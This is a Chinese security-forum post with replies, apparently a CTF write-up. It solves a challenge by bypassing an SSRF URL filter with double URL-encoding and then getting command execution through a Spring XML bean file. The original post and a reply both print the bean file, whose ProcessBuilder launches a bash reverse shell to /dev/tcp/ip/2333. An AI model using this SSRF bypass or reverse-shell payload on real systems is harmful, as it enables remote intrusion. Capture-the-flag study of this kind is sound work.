首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. CTF对抗
    3. 发新帖
[原创]第一题 至暗时刻
发表于: 2020-11-19 10:57 4340

[原创]第一题 至暗时刻

Ha1c9on 活跃值
2020-11-19 10:57
4340

需要ssrf127.0.0.1的8088端口 有正则需要带有 .pediy .com/ 测了一会儿发现使用urlencode两次就可以ssrf了

http://121.36.145.157:8088/getimage?url=http://127.0.0.1%253a8088%253f.pediy.com/loadConfig?url=http://ip/payload.xml

这样也可以绕ssrf 不过需要服务器写一个302跳转
http://121.36.145.157:8088/getimage?url=http://@@127.0.0.1:1234@m.pediy.com/loadConfig?url=http://127.0.0.1/

ssrf成功后发现需要xml

发现可以用FileSystemXmlApplicationContext 命令执行

https://www.cnblogs.com/afanti/p/10815728.html

使用这里的payload拿shell

image-20201118141836349

拿到shell以后 把home下的jar下载回来

用jd-gui 反编译拿到flag

img

 
 
 
 
 
 
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg >
            <list>
                <value>bash</value>
                <value>-c</value>
                <value><![CDATA[bash >& /dev/tcp/ip/2333 0>&1]]

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 2
支持
分享
最新回复 (3)
KooJiSung
雪    币: 357
活跃值: (3433)
能力值: ( LV3,RANK:25 )
在线值:
发帖
回帖
粉丝
私信
2
我的sc.xml
HTTP/1.1 200 OK
Server: nginx/1.9.4
Date: Thu, 19 Nov 2020 06:55:42 GMT
Content-Type: text/xml
Content-Length: 550

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
       <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
               <constructor-arg>
                       <list>
                               <value>bash</value>
                               <value>-c</value>
                               <value><![CDATA[bash >& /dev/tcp/ip/2333 0>&1]]></value>
                       </list>
               </constructor-arg>
       </bean>
</beans>

执行提示 FreeMarker template error
2020-11-19 15:20
0
香草0x00
雪    币: 638
活跃值: (795)
能力值: ( LV6,RANK:93 )
在线值:
发帖
回帖
粉丝
私信
3
虽然报错了,但是执行了呀
2020-11-19 15:37
0
xjklewh
雪    币: 403
活跃值: (798)
能力值: ( LV4,RANK:58 )
在线值:
发帖
回帖
粉丝
私信
4
学习了
2020-11-19 16:28
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//